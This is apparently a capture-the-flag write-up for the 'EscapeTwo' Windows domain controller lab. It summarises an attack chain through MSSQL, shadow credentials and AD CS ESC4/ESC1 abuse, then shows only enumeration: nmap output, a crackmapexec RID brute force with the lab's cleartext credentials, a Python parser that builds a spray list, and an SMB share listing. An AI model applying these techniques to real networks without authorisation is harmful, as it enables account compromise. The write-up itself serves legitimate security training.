
Week 1. EscapeTwo

SUMMARY

This is a Windows Server 2019 machine running as a domain controller. In an SMB share we find an XLSX file containing the MSSQL sa account password in clear text, which gives us an initial shell on the system as the SQL service account. Once inside, we find a password in an MSSQL configuration file that can be reused to move laterally to another domain user and collect the user flag.

Regarding escalation, we enumerate the AD with BloodHound CE and discover a permissive edge (WriteOwner over the ca_svc user) that allows a shadow credentials attack and lateral movement to that account. Under the new context, we enumerate AD CS templates with Certipy and find one vulnerable to ESC4; rewriting it turns it into an ESC1 template, which lets us request a certificate as administrator and dump the administrator's NT hash.

KEYWORDS

MSSQL, Impacket, mssqlclient.py, xp_cmdshell, owneredit.py, dacledit.py, shadow credentials attack, Certipy, Active Directory Certificate Services (AD CS), ESC4, ESC1.

ENUMERATION

Port scan.

> for ports in $(nmap $target -p- --min-rate=5000 -Pn --open --reason | grep open | awk -F "/" '{print $1}' | tr '\n' ',' | sed s/,$//); do nmap $target -p$ports -sV -sC -Pn -vv -n && echo "\nList of open ports: $ports";done
 
Nmap scan report for 10.10.11.51
Host is up, received user-set (0.058s latency).
Scanned at 2025-01-19 12:37:19 GMT for 101s
PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-01-19 12:38:39Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after:  2025-06-08T17:35:00
| MD5:   09fd3df49f58da05410de89e7442b6ff
| SHA-1: c3ac8bfd6132ed7729757f5e69901ced528eaac5
| -----BEGIN CERTIFICATE-----
| MIIGJjCCBQ6gAwIBAgITVAAAAANDveocXlnSDQAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
| MRcwFQYDVQQDEw5zZXF1ZWwtREMwMS1DQTAeFw0yNDA2MDgxNzM1MDBaFw0yNTA2
| MDgxNzM1MDBaMBoxGDAWBgNVBAMTD0RDMDEuc2VxdWVsLmh0YjCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBANRCnm8pZ86LZP3kAtl29rFgY5gEOEXSCZSm
| F6Ai+1vh6a8LrCRKMWtC8+Kla0PXgjTcGcmDawcI8h0BsaSH6sQVAD21ca5MQcv0
| xf+4TzrvAnp9H+pVHO1r42cLXBwq14Ak8dSueiOLgxoLKO1CDtKk+e8ZxQWf94Bp
| Vu8rnpImFT6IeDgACeBfb0hLzK2JJRT9ezZiUVxoTfMKKuy4IPFWcshW/1bQfEK0
| ExOcQZVaoCJzRPBUVTp/XGHEW9d6abW8h1UR+64qVfGexsrUKBfxKRsHuHTxa4ts
| +qUVJRbJkzlSgyKGMjhNfT3BPVwwP8HvErWvbsWKKPRkvMaPhU0CAwEAAaOCAzcw
| ggMzMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs
| AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD
| AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME
| AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg
| hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFNfVXsrpSahW
| xfdL4wxFDgtUztvRMB8GA1UdIwQYMBaAFMZBubbkDkfWBlps8YrGlP0a+7jDMIHI
| BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPXNlcXVlbC1EQzAxLUNB
| LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jZXJ0aWZp
| Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0
| aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6
| Ly8vQ049c2VxdWVsLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl
| cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERD
| PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv
| bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBDjAT1NPPfwT4sa
| sNjnBqS3gg9EQzAxLnNlcXVlbC5odGIwTQYJKwYBBAGCNxkCBEAwPqA8BgorBgEE
| AYI3GQIBoC4ELFMtMS01LTIxLTU0ODY3MDM5Ny05NzI2ODc0ODQtMzQ5NjMzNTM3
| MC0xMDAwMA0GCSqGSIb3DQEBCwUAA4IBAQCBDjlZZbFac6RlhZ2BhLzvWmA1Xcyn
| jZmYF3aOXmmof1yyO/kxk81fStsu3gtZ94KmpkBwmd1QkSJCuT54fTxg17xDtA49
| QF7O4DPsFkeOM2ip8TAf8x5bGwH5tlZvNjllBCgSpCupZlNY8wKYnyKQDNwtWtgL
| UF4SbE9Q6JWA+Re5lPa6AoUr/sRzKxcPsAjK8kgquUA0spoDrxAqkADIRsHgBLGY
| +Wn+DXHctZtv8GcOwrfW5KkbkVykx8DSS2qH4y2+xbC3ZHjsKlVjoddkjEkrHku0
| 2iXZSIqShMXzXmLTW/G+LzqK3U3VTcKo0yUKqmLlKyZXzQ+kYVLqgOOX
|_-----END CERTIFICATE-----
|_ssl-date: 2025-01-19T12:40:16+00:00; +1m17s from scanner time.
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after:  2025-06-08T17:35:00
| MD5:   09fd3df49f58da05410de89e7442b6ff
| SHA-1: c3ac8bfd6132ed7729757f5e69901ced528eaac5
| -----BEGIN CERTIFICATE-----
| MIIGJjCCBQ6gAwIBAgITVAAAAANDveocXlnSDQAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
| MRcwFQYDVQQDEw5zZXF1ZWwtREMwMS1DQTAeFw0yNDA2MDgxNzM1MDBaFw0yNTA2
| MDgxNzM1MDBaMBoxGDAWBgNVBAMTD0RDMDEuc2VxdWVsLmh0YjCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBANRCnm8pZ86LZP3kAtl29rFgY5gEOEXSCZSm
| F6Ai+1vh6a8LrCRKMWtC8+Kla0PXgjTcGcmDawcI8h0BsaSH6sQVAD21ca5MQcv0
| xf+4TzrvAnp9H+pVHO1r42cLXBwq14Ak8dSueiOLgxoLKO1CDtKk+e8ZxQWf94Bp
| Vu8rnpImFT6IeDgACeBfb0hLzK2JJRT9ezZiUVxoTfMKKuy4IPFWcshW/1bQfEK0
| ExOcQZVaoCJzRPBUVTp/XGHEW9d6abW8h1UR+64qVfGexsrUKBfxKRsHuHTxa4ts
| +qUVJRbJkzlSgyKGMjhNfT3BPVwwP8HvErWvbsWKKPRkvMaPhU0CAwEAAaOCAzcw
| ggMzMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs
| AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD
| AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME
| AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg
| hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFNfVXsrpSahW
| xfdL4wxFDgtUztvRMB8GA1UdIwQYMBaAFMZBubbkDkfWBlps8YrGlP0a+7jDMIHI
| BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPXNlcXVlbC1EQzAxLUNB
| LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jZXJ0aWZp
| Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0
| aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6
| Ly8vQ049c2VxdWVsLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl
| cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERD
| PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv
| bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBDjAT1NPPfwT4sa
| sNjnBqS3gg9EQzAxLnNlcXVlbC5odGIwTQYJKwYBBAGCNxkCBEAwPqA8BgorBgEE
| AYI3GQIBoC4ELFMtMS01LTIxLTU0ODY3MDM5Ny05NzI2ODc0ODQtMzQ5NjMzNTM3
| MC0xMDAwMA0GCSqGSIb3DQEBCwUAA4IBAQCBDjlZZbFac6RlhZ2BhLzvWmA1Xcyn
| jZmYF3aOXmmof1yyO/kxk81fStsu3gtZ94KmpkBwmd1QkSJCuT54fTxg17xDtA49
| QF7O4DPsFkeOM2ip8TAf8x5bGwH5tlZvNjllBCgSpCupZlNY8wKYnyKQDNwtWtgL
| UF4SbE9Q6JWA+Re5lPa6AoUr/sRzKxcPsAjK8kgquUA0spoDrxAqkADIRsHgBLGY
| +Wn+DXHctZtv8GcOwrfW5KkbkVykx8DSS2qH4y2+xbC3ZHjsKlVjoddkjEkrHku0
| 2iXZSIqShMXzXmLTW/G+LzqK3U3VTcKo0yUKqmLlKyZXzQ+kYVLqgOOX
|_-----END CERTIFICATE-----
|_ssl-date: 2025-01-19T12:40:16+00:00; +1m17s from scanner time.
1433/tcp  open  ms-sql-s      syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-01-19T12:40:16+00:00; +1m17s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-01-18T18:40:12
| Not valid after:  2055-01-18T18:40:12
| MD5:   85f1791dca227d5a5c6f7600dad57dad
| SHA-1: 4724c7db5f1c2fdb9e4670a64895e728de85171e
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQHeU6tFZApItE1TBh0S85lTANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjUwMTE4MTg0MDEyWhgPMjA1NTAxMTgxODQwMTJaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALc6C9kY
| sFYn2KT6RED682MNEWGAihfdLMlBXHXBwfeGq+0Ekj2CQdX1t+MBgsWbcXyhFqut
| 2a+K9QAA3uLoYD/skIRVr13XdZMtGXz2q/Td2D0UD+UVmpUcG4KAu37LHyWc7z0W
| M0TeLGalIcvZCoz34b6V0cPQS3O6tGFPkqNa8V2VnuKEe6NtBk5uxi2uCdhnxEeN
| RM9NcflJ4ZKUPBukCxrxl7d440Ri9sZ2VaHfnR7BJq6ynqDuwM2FEWgHusf9s0dK
| OOmWz7PFVT1T2GgTf8FYoYHgWGGmM/YQCieY0GFeKTEJ53XGBpqwZHJ0BXgLbj3K
| ZWXapzr2eszCD40CAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAqZNdKbRXoK0PZhf7
| x6DQgQBMRJwaHf8UqsOtGzQCNjboVJ7NlJkOsGaxoTOQAAFZX5BGJzxA+9EpKKoG
| 0paUvuEFPChIe45h2rfIwNeCpoIDnDn8zbKQvKDDwz5/f6v4+8mtdcygUXnt4iXX
| a6jPCXzHkPuND1V2QgCmr6gs1KpBCLX6fjyTMvzOA5fG1K/p6CMAF4bP2vvJ4NLA
| tKdJMtlj8XI32rYczM54VvTGGoyo7HnE4JZeZm3gx/OBcTZB8d6j3VMpoZFsZDeL
| XWqGAW3I0wjKl9gqzTBfc16SkyEcxTfGQ1kRGn6F7gwGn6G8+yQM9mbgjILt/G9e
| KbAmWQ==
|_-----END CERTIFICATE-----
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after:  2025-06-08T17:35:00
| MD5:   09fd3df49f58da05410de89e7442b6ff
| SHA-1: c3ac8bfd6132ed7729757f5e69901ced528eaac5
| -----BEGIN CERTIFICATE-----
| MIIGJjCCBQ6gAwIBAgITVAAAAANDveocXlnSDQAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
| MRcwFQYDVQQDEw5zZXF1ZWwtREMwMS1DQTAeFw0yNDA2MDgxNzM1MDBaFw0yNTA2
| MDgxNzM1MDBaMBoxGDAWBgNVBAMTD0RDMDEuc2VxdWVsLmh0YjCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBANRCnm8pZ86LZP3kAtl29rFgY5gEOEXSCZSm
| F6Ai+1vh6a8LrCRKMWtC8+Kla0PXgjTcGcmDawcI8h0BsaSH6sQVAD21ca5MQcv0
| xf+4TzrvAnp9H+pVHO1r42cLXBwq14Ak8dSueiOLgxoLKO1CDtKk+e8ZxQWf94Bp
| Vu8rnpImFT6IeDgACeBfb0hLzK2JJRT9ezZiUVxoTfMKKuy4IPFWcshW/1bQfEK0
| ExOcQZVaoCJzRPBUVTp/XGHEW9d6abW8h1UR+64qVfGexsrUKBfxKRsHuHTxa4ts
| +qUVJRbJkzlSgyKGMjhNfT3BPVwwP8HvErWvbsWKKPRkvMaPhU0CAwEAAaOCAzcw
| ggMzMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs
| AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD
| AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME
| AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg
| hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFNfVXsrpSahW
| xfdL4wxFDgtUztvRMB8GA1UdIwQYMBaAFMZBubbkDkfWBlps8YrGlP0a+7jDMIHI
| BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPXNlcXVlbC1EQzAxLUNB
| LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jZXJ0aWZp
| Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0
| aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6
| Ly8vQ049c2VxdWVsLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl
| cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERD
| PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv
| bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBDjAT1NPPfwT4sa
| sNjnBqS3gg9EQzAxLnNlcXVlbC5odGIwTQYJKwYBBAGCNxkCBEAwPqA8BgorBgEE
| AYI3GQIBoC4ELFMtMS01LTIxLTU0ODY3MDM5Ny05NzI2ODc0ODQtMzQ5NjMzNTM3
| MC0xMDAwMA0GCSqGSIb3DQEBCwUAA4IBAQCBDjlZZbFac6RlhZ2BhLzvWmA1Xcyn
| jZmYF3aOXmmof1yyO/kxk81fStsu3gtZ94KmpkBwmd1QkSJCuT54fTxg17xDtA49
| QF7O4DPsFkeOM2ip8TAf8x5bGwH5tlZvNjllBCgSpCupZlNY8wKYnyKQDNwtWtgL
| UF4SbE9Q6JWA+Re5lPa6AoUr/sRzKxcPsAjK8kgquUA0spoDrxAqkADIRsHgBLGY
| +Wn+DXHctZtv8GcOwrfW5KkbkVykx8DSS2qH4y2+xbC3ZHjsKlVjoddkjEkrHku0
| 2iXZSIqShMXzXmLTW/G+LzqK3U3VTcKo0yUKqmLlKyZXzQ+kYVLqgOOX
|_-----END CERTIFICATE-----
|_ssl-date: 2025-01-19T12:40:16+00:00; +1m17s from scanner time.
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-19T12:40:16+00:00; +1m17s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after:  2025-06-08T17:35:00
| MD5:   09fd3df49f58da05410de89e7442b6ff
| SHA-1: c3ac8bfd6132ed7729757f5e69901ced528eaac5
| -----BEGIN CERTIFICATE-----
| MIIGJjCCBQ6gAwIBAgITVAAAAANDveocXlnSDQAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
| MRcwFQYDVQQDEw5zZXF1ZWwtREMwMS1DQTAeFw0yNDA2MDgxNzM1MDBaFw0yNTA2
| MDgxNzM1MDBaMBoxGDAWBgNVBAMTD0RDMDEuc2VxdWVsLmh0YjCCASIwDQYJKoZI
| hvcNAQEBBQADggEPADCCAQoCggEBANRCnm8pZ86LZP3kAtl29rFgY5gEOEXSCZSm
| F6Ai+1vh6a8LrCRKMWtC8+Kla0PXgjTcGcmDawcI8h0BsaSH6sQVAD21ca5MQcv0
| xf+4TzrvAnp9H+pVHO1r42cLXBwq14Ak8dSueiOLgxoLKO1CDtKk+e8ZxQWf94Bp
| Vu8rnpImFT6IeDgACeBfb0hLzK2JJRT9ezZiUVxoTfMKKuy4IPFWcshW/1bQfEK0
| ExOcQZVaoCJzRPBUVTp/XGHEW9d6abW8h1UR+64qVfGexsrUKBfxKRsHuHTxa4ts
| +qUVJRbJkzlSgyKGMjhNfT3BPVwwP8HvErWvbsWKKPRkvMaPhU0CAwEAAaOCAzcw
| ggMzMC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABs
| AGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQD
| AgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQME
| AgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglg
| hkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFNfVXsrpSahW
| xfdL4wxFDgtUztvRMB8GA1UdIwQYMBaAFMZBubbkDkfWBlps8YrGlP0a+7jDMIHI
| BgNVHR8EgcAwgb0wgbqggbeggbSGgbFsZGFwOi8vL0NOPXNlcXVlbC1EQzAxLUNB
| LENOPURDMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jZXJ0aWZp
| Y2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0
| aW9uUG9pbnQwgb8GCCsGAQUFBwEBBIGyMIGvMIGsBggrBgEFBQcwAoaBn2xkYXA6
| Ly8vQ049c2VxdWVsLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNl
| cnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERD
| PWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlv
| bkF1dGhvcml0eTA7BgNVHREENDAyoB8GCSsGAQQBgjcZAaASBBDjAT1NPPfwT4sa
| sNjnBqS3gg9EQzAxLnNlcXVlbC5odGIwTQYJKwYBBAGCNxkCBEAwPqA8BgorBgEE
| AYI3GQIBoC4ELFMtMS01LTIxLTU0ODY3MDM5Ny05NzI2ODc0ODQtMzQ5NjMzNTM3
| MC0xMDAwMA0GCSqGSIb3DQEBCwUAA4IBAQCBDjlZZbFac6RlhZ2BhLzvWmA1Xcyn
| jZmYF3aOXmmof1yyO/kxk81fStsu3gtZ94KmpkBwmd1QkSJCuT54fTxg17xDtA49
| QF7O4DPsFkeOM2ip8TAf8x5bGwH5tlZvNjllBCgSpCupZlNY8wKYnyKQDNwtWtgL
| UF4SbE9Q6JWA+Re5lPa6AoUr/sRzKxcPsAjK8kgquUA0spoDrxAqkADIRsHgBLGY
| +Wn+DXHctZtv8GcOwrfW5KkbkVykx8DSS2qH4y2+xbC3ZHjsKlVjoddkjEkrHku0
| 2iXZSIqShMXzXmLTW/G+LzqK3U3VTcKo0yUKqmLlKyZXzQ+kYVLqgOOX
|_-----END CERTIFICATE-----
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49685/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         syn-ack Microsoft Windows RPC
49689/tcp open  msrpc         syn-ack Microsoft Windows RPC
49694/tcp open  msrpc         syn-ack Microsoft Windows RPC
49716/tcp open  msrpc         syn-ack Microsoft Windows RPC
49739/tcp open  msrpc         syn-ack Microsoft Windows RPC
49809/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
|_clock-skew: mean: 1m16s, deviation: 0s, median: 1m16s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 62012/tcp): CLEAN (Timeout)
|   Check 2 (port 54223/tcp): CLEAN (Timeout)
|   Check 3 (port 49465/udp): CLEAN (Timeout)
|   Check 4 (port 20179/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
|   date: 2025-01-19T12:39:38
|_  start_date: N/A
 
Nmap done: 1 IP address (1 host up) scanned in 102.00 seconds
 
List of open ports: 53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,47001,49664,49665,49666,49667,49685,49686,49689,49694,49716,49739,49809

The host looks like a domain controller: the domain is sequel.htb, the DC's hostname is DC01.sequel.htb, and the LDAP certificate is issued by sequel-DC01-CA, so an enterprise CA (AD CS) is present. Note also the +1m17s clock skew reported by ssl-date; Kerberos tolerates up to five minutes, but it is worth syncing our clock before the certificate-based authentication later on.

We have the credentials rose:KxEPkKe6R8su (provided with the box), so we start with an RID brute force to enumerate additional usernames. Keep only the SidTypeUser lines (dropping groups and aliases) and save the result, since the list is used for password spraying later.

> crackmapexec smb sequel.htb -u rose -p 'KxEPkKe6R8su' --rid-brute | grep SidTypeUser | cut -d '\' -f 2 | awk '{print $1}' | tr '[:upper:]' '[:lower:]' > userlist
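
The shell pipeline above passes every line through (banner lines included) unless it is filtered. The parser below is an added example for this writeup, not part of crackmapexec or netexec: it keeps only the SID types you ask for, drops machine accounts by default, and de-duplicates while preserving RID order. The sample output embedded in it is constructed to mimic the tool's line format; the RIDs and names are illustrative, not a capture from the box.

```python
import re
import sys
from typing import Iterable

# One regex for the per-RID lines crackmapexec/netexec print with --rid-brute, e.g.
#   SMB  10.10.11.51  445  DC01  1103: SEQUEL\rose (SidTypeUser)
# Banner and status lines do not match and are skipped.
RID_LINE = re.compile(
    r"(?P<rid>\d+):\s+(?P<domain>[^\\\s]+)\\(?P<name>.+?)\s+\((?P<kind>SidType\w+)\)\s*$"
)


def parse_rid_brute(lines: Iterable[str], kinds=("SidTypeUser",), keep_machines=False) -> list[str]:
    """Return lowercase, de-duplicated account names (in RID order) for the
    requested SID types. Machine accounts (trailing '$') are dropped by default
    because they are not useful password-spray targets."""
    names: list[str] = []
    for line in lines:
        match = RID_LINE.search(line)
        if not match or match.group("kind") not in kinds:
            continue
        name = match.group("name").lower()
        if name.endswith("$") and not keep_machines:
            continue
        if name not in names:
            names.append(name)
    return names


# Constructed sample output: only the structure mirrors the real tool output.
SAMPLE_OUTPUT = """\
SMB  10.10.11.51  445  DC01  [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB  10.10.11.51  445  DC01  [+] Brute forcing RIDs
SMB  10.10.11.51  445  DC01  498: SEQUEL\\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB  10.10.11.51  445  DC01  500: SEQUEL\\Administrator (SidTypeUser)
SMB  10.10.11.51  445  DC01  501: SEQUEL\\Guest (SidTypeUser)
SMB  10.10.11.51  445  DC01  512: SEQUEL\\Domain Admins (SidTypeGroup)
SMB  10.10.11.51  445  DC01  1000: SEQUEL\\DC01$ (SidTypeUser)
SMB  10.10.11.51  445  DC01  1103: SEQUEL\\rose (SidTypeUser)
"""

if __name__ == "__main__":
    # Usage: crackmapexec smb sequel.htb -u rose -p '...' --rid-brute | python3 ridparse.py > userlist
    # Without piped input it runs over the constructed sample.
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE_OUTPUT.splitlines()
    print("\n".join(parse_rid_brute(source)))
```

Pass kinds=("SidTypeGroup",) to pull group names instead, which is handy when checking membership of groups such as Cert Publishers later in the chain.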

Also enumerate SMB shares with provided credentials.

> smbmap -H sequel.htb -P 445 -u rose -p KxEPkKe6R8su
[+] IP: sequel.htb:445  Name: unknown                                          
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        Accounting Department                                   READ ONLY
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
